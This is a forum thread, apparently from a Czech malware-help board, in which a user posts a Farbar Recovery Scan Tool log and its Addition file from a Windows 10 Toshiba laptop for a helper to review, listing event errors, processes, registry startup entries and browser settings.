Error: (04/21/2016 01:04:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: MICK)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (04/20/2016 10:50:46 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418219

Error: (04/20/2016 08:57:43 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10006) (User: MICK)
Description: Application or service 'Microsoft Office Document Cache Sync Client Interface' could not be shut down.

Error: (04/20/2016 08:23:29 PM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_DROP_MEMBERSHIP)

System Error: 10049
System Message: The requested address is not valid in its context.

(srv 64 bit)

Error: (04/20/2016 08:23:00 PM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_ADD_MEMBERSHIP)

System Error: 10065
System Message: A socket operation was attempted to an unreachable host.

(srv 64 bit)

Error: (04/20/2016 08:23:00 PM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_DROP_MEMBERSHIP)

System Error: 10049
System Message: The requested address is not valid in its context.

(srv 64 bit)

Error: (04/20/2016 08:23:00 PM) (Source: dwmrcs) (EventID: 110) (User: )
Description: Error:
DameWare Mini Remote Control
Error setsockopt (IP_ADD_MEMBERSHIP)

System Error: 10065
System Message: A socket operation was attempted to an unreachable host.

(srv 64 bit)

Error: (04/19/2016 10:50:46 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418219


System errors:
=============
Error: (04/21/2016 10:50:38 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_584fb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/21/2016 10:50:38 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_584fb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/21/2016 10:50:38 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_584fb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/21/2016 10:50:38 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_584fb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/21/2016 08:54:09 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Downloaded Maps Manager service hung on starting.

Error: (04/21/2016 08:52:05 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Delivery Optimization service hung on starting.

Error: (04/21/2016 08:52:00 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {B91D5831-B1BD-4608-8198-D72E155020F7}

Error: (04/21/2016 08:46:14 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
%%1058

Error: (04/21/2016 08:44:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Modules Installer service failed to start due to the following error:
%%1069

Error: (04/21/2016 08:44:55 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The TrustedInstaller service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).


CodeIntegrity:
===================================
Date: 2016-04-16 19:37:06.388
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-04-15 20:03:57.177
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-25 18:00:13.348
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-11 22:52:21.673
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-11 19:17:12.213
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-10 19:32:29.712
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-09 19:30:45.097
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-07 20:29:43.088
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-07 19:31:39.383
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-02 19:33:54.420
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz
Percentage of memory in use: 58%
Total physical RAM: 3957.59 MB
Available physical RAM: 1624.59 MB
Total Virtual: 7925.59 MB
Available Virtual: 5047.6 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:232.88 GB) (Free:64.16 GB) NTFS
Drive d: (Data) (Fixed) (Total:232.49 GB) (Free:135.99 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 22F49805)
Partition 1: (Not Active) - (Size=400 MB) - (Type=27)
Partition 2: (Not Active) - (Size=232.9 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=232.5 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

[Rudy]

Toto je pouze Additional. K vyčištění potřebuji i log FRST. Děkuji.

[boutek]

Ups to jsem prehledl. Tak tady:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-04-2016
Ran by Administrator (administrator) on MICK (25-04-2016 20:05:29)
Running from C:\Users\Administrator\Downloads
Loaded Profiles: Administrator (Available Profiles: Administrator & Guest & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(SolarWinds) C:\Windows\System32\DNTUS26.EXE
(IVT Corporation) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(IVT Corporation) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BsHelpCS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
(TOSHIBA Corporation.) C:\Program Files\TOSHIBA\HDMICtrlMan\HDMICtrlMan.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Dropbox, Inc.) C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Oracle Corporation) C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\avastui.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(Piriform Ltd) C:\Program Files (x86)\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(IVT Corporation) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BtTray.exe
(Farbar) C:\Users\Administrator\Downloads\FRST64 (1).exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8095776 2009-08-31] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\Windows\system32\thpsrv /logon
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2009-11-05] (TOSHIBA Corporation)
HKLM\...\Run: [HDMICtrlMan] => C:\Program Files\TOSHIBA\HDMICtrlMan\HDMICtrlMan.exe [1032536 2009-10-23] (TOSHIBA Corporation.)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [Toshiba Registration] => C:\Program Files\Toshiba\Registration\ToshibaReminder.exe [134032 2009-08-25] (Toshiba Europe GmbH)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [298944 2011-12-12] (SolarWinds)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284696 2009-10-02] (Intel Corporation)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2009-06-02] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34088 2009-01-13] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2009-11-21] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [ToshibaServiceStation] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [7139256 2016-03-23] (AVAST Software)
HKLM-x32\...\Run: [BtTray] => C:\Program Files (x86)\IVT Corporation\BlueSoleil\BtTray.exe [315478 2009-09-02] (IVT Corporation)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [mbot_gb_014010252] => [X]
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Run: [GoogleChromeAutoLaunch_361C1DD22E1256C6B68316A32E8B1949] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [881304 2016-04-20] (Google Inc.)
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Run: [Dropbox Update] => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-19] (Dropbox, Inc.)
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Run: [Remote Mouse] => C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe [837632 2015-11-18] (RemoteMouse.net)
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Run: [CCleaner Monitoring] => C:\Program Files (x86)\CCleaner\CCleaner64.exe [8619224 2016-01-15] (Piriform Ltd)
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Run: [Chromium] => c:\users\administrator\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\amd64"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6302.0225] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6302.0225"
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShA64.dll [2016-02-19] (AVAST Software)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-20] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-20] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-20] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt.30.dll [2016-04-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-04-15]
ShortcutTarget: Dropbox.lnk -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2011-10-23]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AirStream-Suite.lnk [2015-10-24]
ShortcutTarget: AirStream-Suite.lnk -> C:\Windows\Installer\{734D87EE-15DC-49C9-943E-605E9B55A5D8}\_7A184E116278B0ED1EDD31.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TRDCReminder.lnk [2009-12-07]
ShortcutTarget: TRDCReminder.lnk -> C:\Program Files (x86)\TOSHIBA\TRDCReminder\TRDCReminder.exe (TOSHIBA Europe)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TRDCReminder.lnk [2009-12-07]
ShortcutTarget: TRDCReminder.lnk -> C:\Program Files (x86)\TOSHIBA\TRDCReminder\TRDCReminder.exe (TOSHIBA Europe)
Startup: C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TRDCReminder.lnk [2009-12-07]
ShortcutTarget: TRDCReminder.lnk -> C:\Program Files (x86)\TOSHIBA\TRDCReminder\TRDCReminder.exe (TOSHIBA Europe)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TRDCReminder.lnk [2014-11-05]
ShortcutTarget: TRDCReminder.lnk -> C:\Program Files (x86)\TOSHIBA\TRDCReminder\TRDCReminder.exe (TOSHIBA Europe)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{1e13f6b7-24ec-49f1-935e-50c1fab14810}: [DhcpNameServer] 149.254.230.7 149.254.199.126
Tcpip\..\Interfaces\{70b8dae5-6e0b-44b4-a454-4c5f6bb1f8f2}: [DhcpNameServer] 149.254.230.7 149.254.199.126
Tcpip\..\Interfaces\{86cca158-1b13-41c4-89df-b3fdb04a5c0f}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-4246815794-1745546178-596238576-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> {9C074B02-71C0-4C0D-9BF5-71C08652C882} URL = hxxp://rover.ebay.com/rover/1/710-44557-9400-9/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-4246815794-1745546178-596238576-500 -> {C645BB76-AFFA-4F84-8214-AFA910CC0D6F} URL = hxxp://www.amazon.co.uk/gp/search?ie=UTF8&keyw ... nkCode=ur2
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
